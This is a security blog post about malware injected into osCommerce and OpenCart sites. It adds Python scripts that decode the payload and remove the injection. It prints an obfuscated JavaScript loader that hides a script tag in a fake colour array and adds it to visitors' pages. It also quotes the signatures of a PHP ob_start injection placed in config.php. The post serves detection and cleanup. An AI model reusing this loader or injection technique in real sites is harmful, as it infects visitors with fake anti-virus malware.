osCommerce: Identifying Malware

    Websites are now the primary sales funnel for many businesses. Every day, billions of dollars of business are conducted by small- to medium-sized businesses via their web sites. Most e-commerce web sites use a piece of software called a shopping cart, which lets users pick and choose what they would like to buy and then pay via a number of payment methods.

    One popular application that web site owners use to manage online transactions is osCommerce; thousands of websites run it. In the last three months we have witnessed a spate of intense attacks targeting shopping cart software such as osCommerce. In this post we discuss the specifics of this attack and how to identify the malware that is injected as a result of the intrusion.

    Identifying the Malware
    The attackers target osCommerce and other shopping carts by exploiting an application vulnerability to inject malware into the web site running the shopping cart; visitors to the infected site are in turn exposed to infection. This strain of malware has been extremely pervasive.

    We have seen variants of the following malware on web sites running osCommerce and OpenCart shopping cart software. The malware can be found in JavaScript, PHP, and HTML files on the infected web site.

    <script type="text/javascript" src="catalog/view/javascript/unitpngfix/unitpngfix.js"></script>
    <script type="text/javascript">
    if (typeof(redef_colors) == "undefined") {
      // The "colours" are not colours: each '#rrggbb' entry carries three encoded bytes.
      var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d');
      var redef_colors = 1;
      var colors_picked = 0;
      // Decodes the array: every two-digit hex pair, minus 15, is one character.
      function div_pick_colors(t, styled) {
        var s = "";
        for (j = 0; j < t.length; j++) {
          var c_rgb = t[j];
          for (i = 1; i < 7; i++) {
            var c_clr = c_rgb.substr(i++, 2);
            if (c_clr != "00") s += String.fromCharCode(parseInt(c_clr, 16) - 15);
          }
        }
        if (styled) {
          s = s.substr(0, 36) + s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime() + s.substr((s.length - 2));
        } else {
          s = s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime();
        }
        return s;
      }
      // Injects the decoded content, either by document.write or as a new <script> element.
      function try_pick_colors() {
        try {
          if (!document.getElementById || !document.createElement) {
            document.write(div_pick_colors(div_colors, 1));
          } else {
            var new_cstyle = document.createElement("script");
            new_cstyle.type = "text/javascript";
            new_cstyle.src = div_pick_colors(div_colors, 0);
            document.getElementsByTagName("head")[0].appendChild(new_cstyle);
          }
        } catch (e) { }
        try {
          check_colors_picked();
        } catch (e) {
          setTimeout("try_pick_colors()", 500);
        }
      }
      try_pick_colors();
    }
    </script>
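The array of '#rrggbb' values in the sample above is not a colour table but an encoded string: each entry holds three bytes, every byte is stored as a two-digit hex value increased by 15, and "00" pairs are padding. The following Python script is an added example, not code from the original post; it reproduces that decoding so an analyst can read what such an array hides without executing the script, and it can be pointed at a JavaScript file to pull out every array of this shape. The embedded sample array and the text it encodes (a placeholder address on example.invalid) are constructed for the demonstration; the decoding rule itself is taken from the sample's div_pick_colors function.

```python
"""Decode the fake colour arrays used by the osCommerce script injection.

Added example (not from the original post). The decoding mirrors the
sample's div_pick_colors loop: substr(1,2), substr(3,2) and substr(5,2) of
each '#rrggbb' entry are read (the loop index is bumped twice per pass),
"00" pairs are skipped, and each remaining pair yields chr(int(pair,16)-15).
"""
import re

SHIFT = 15  # the sample subtracts 15 from every byte it decodes

# Matches the "new Array('#4b8272', '#81787f', ...)" literal used by the sample.
_ARRAY_RE = re.compile(r"new\s+Array\s*\(((?:\s*'#[0-9a-fA-F]{6}'\s*,?)+)\)")
_ENTRY_RE = re.compile(r"'#([0-9a-fA-F]{6})'")


def decode_color_array(colors):
    """Return the text hidden in a list of '#rrggbb' strings."""
    out = []
    for entry in colors:
        body = entry.lstrip("#")[:6]
        for i in range(0, 6, 2):
            pair = body[i:i + 2]
            if len(pair) == 2 and pair != "00":
                value = int(pair, 16) - SHIFT
                if value >= 0:          # malformed pairs are ignored, not crashed on
                    out.append(chr(value))
    return "".join(out)


def encode_as_colors(text):
    """Inverse of decode_color_array; used here only to build a labelled
    test sample (ASCII input, padded with "00" to a multiple of three bytes)."""
    raw = [ord(ch) + SHIFT for ch in text]
    if any(b > 0xFF for b in raw):
        raise ValueError("only ASCII text fits the encoding")
    while len(raw) % 3:
        raw.append(0)
    return ["#" + "".join(f"{b:02x}" for b in raw[i:i + 3])
            for i in range(0, len(raw), 3)]


def extract_hidden_strings(js_source):
    """Find every '#rrggbb' array literal in a JavaScript file and decode it."""
    results = []
    for m in _ARRAY_RE.finditer(js_source):
        entries = ["#" + c for c in _ENTRY_RE.findall(m.group(1))]
        results.append(decode_color_array(entries))
    return results


# Constructed sample: a placeholder tag encoded the same way as the real payload.
HIDDEN = '<script src="http://example.invalid/x.js">'
SAMPLE_JS = ("var div_colors = new Array("
             + ", ".join(f"'{c}'" for c in encode_as_colors(HIDDEN))
             + ");")

if __name__ == "__main__":
    import sys
    source = open(sys.argv[1], encoding="utf-8", errors="replace").read() \
        if len(sys.argv) > 1 else SAMPLE_JS
    for hidden in extract_hidden_strings(source):
        print(hidden)
```

Run it with the path of a suspect .js or .html file as the first argument; with no argument it decodes the constructed sample. A decoded result that starts with a tag such as <script or <iframe is the confirmation that the "colour" array is a payload carrier.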

    What this Attack Does
    The malware code attempts to display a malicious iframe that can lead the visitor to a fake anti-virus (AV) website, which opens the door to malware being installed on the visitor's personal computer.

    Removing the Malware
    In most shopping cart installations, the malware will have been inserted into the config.php file on your website, usually located at www.yoursite.com/config.php.

    Identify the malware in the config.php file that begins with:

    <?php global $ob_starting;
    if(!$ob_starting) {
    function ob_start_flush($s) {
    $tc = array(0, 69, 84, 82, 67, 83, 79, 7
    

    The malware usually ends with a line similar to:

    $ob_starting = time(); @ob_start("ob_start_flush"); } ?>
    

    The entire block of code, from the start signature through the end signature shown above, must be removed.
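The removal steps above can be applied mechanically. The following Python script is an added example, not code from the original post: it locates the start signature (global $ob_starting;) and the end signature (@ob_start("ob_start_flush"); } ?>) quoted above, extends the match back to the <?php tag that opens the injected block, and returns the file with that block cut out. The config.php contents embedded below are constructed for the demonstration, and the stand-in function body is far shorter than the real injected code. The end signature is the part worth understanding: ob_start() with a callback name tells PHP to pass every page's output buffer through that function before sending it, which is how a single injected file can add the script to every page the site serves.

```python
"""Find and strip the ob_start injection from an osCommerce config.php.

Added example (not from the original post). Signatures are taken from the
post; the sample file content is constructed.
"""
import re
import sys

START_SIG = "global $ob_starting;"
# End signature: @ob_start("ob_start_flush"); } ?>  (either quote style)
END_SIG = re.compile(r'@ob_start\(\s*["\']ob_start_flush["\']\s*\)\s*;\s*\}\s*\?>')


def find_injection(php_source):
    """Return (start, end) character offsets of the injected block, or None.

    A start signature with no matching end is reported as None so the file
    is reviewed by hand rather than partially edited.
    """
    start = php_source.find(START_SIG)
    if start == -1:
        return None
    end = END_SIG.search(php_source, start)
    if end is None:
        return None
    # Pull the span back to the "<?php" that opens the injected block when only
    # whitespace separates the two, so the stray open tag does not stay behind.
    open_tag = php_source.rfind("<?php", 0, start)
    if open_tag != -1 and php_source[open_tag + 5:start].strip() == "":
        start = open_tag
    return start, end.end()


def strip_injection(php_source):
    """Return (cleaned_source, removed_flag)."""
    span = find_injection(php_source)
    if span is None:
        return php_source, False
    s, e = span
    return php_source[:s] + php_source[e:].lstrip("\r\n"), True


# Constructed sample: an injected block prepended to a normal config.php.
INJECTED = (
    '<?php global $ob_starting;\n'
    'if(!$ob_starting) {\n'
    'function ob_start_flush($s) {\n'
    '$tc = array(0, 69, 84, 82);  /* constructed stand-in for the encoded body */\n'
    'return $s; }\n'
    '$ob_starting = time(); @ob_start("ob_start_flush"); } ?>\n'
)
CLEAN_CONFIG = (
    "<?php\n"
    "define('HTTP_SERVER', 'http://www.example.invalid');\n"
    "define('DB_SERVER', 'localhost');\n"
)
SAMPLE = INJECTED + CLEAN_CONFIG

if __name__ == "__main__":
    if len(sys.argv) < 2:
        cleaned, removed = strip_injection(SAMPLE)
        print("removed" if removed else "not found")
        print(cleaned)
    else:
        path = sys.argv[1]
        with open(path, encoding="utf-8", errors="replace") as fh:
            original = fh.read()
        cleaned, removed = strip_injection(original)
        if removed:
            with open(path + ".bak", "w", encoding="utf-8") as fh:
                fh.write(original)              # keep the infected copy for analysis
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(cleaned)
            print(f"{path}: injection removed, original saved as {path}.bak")
        else:
            print(f"{path}: signature not found")
```

Run it with the path to config.php; it writes a .bak copy of the infected file before rewriting, because the removed block is evidence worth keeping for the vulnerability analysis recommended in the conclusion. With no argument it runs on the constructed sample.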

    Conclusion
    After removing the malware, you must upgrade your installation of osCommerce to osCommerce 2.3 or higher and analyze your website for any application vulnerabilities. Securing the permission settings of your admin directory, or renaming the directory to something other than the default, can mitigate automated attacks that attempt to exploit osCommerce 2.2 versions.

    If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

    • Thanks for the information regarding this leak on oscommerce.

      Posted by Jean on September 21st

    • […] have described how malicious hackers exploit OSCommerce installations in the past, in this article. This current post details a newer upcoming piece of malware that is affecting OSCommerce […]

      Posted by OScommerce hacks – stopthehacker.com – Jaal, LLC on November 7th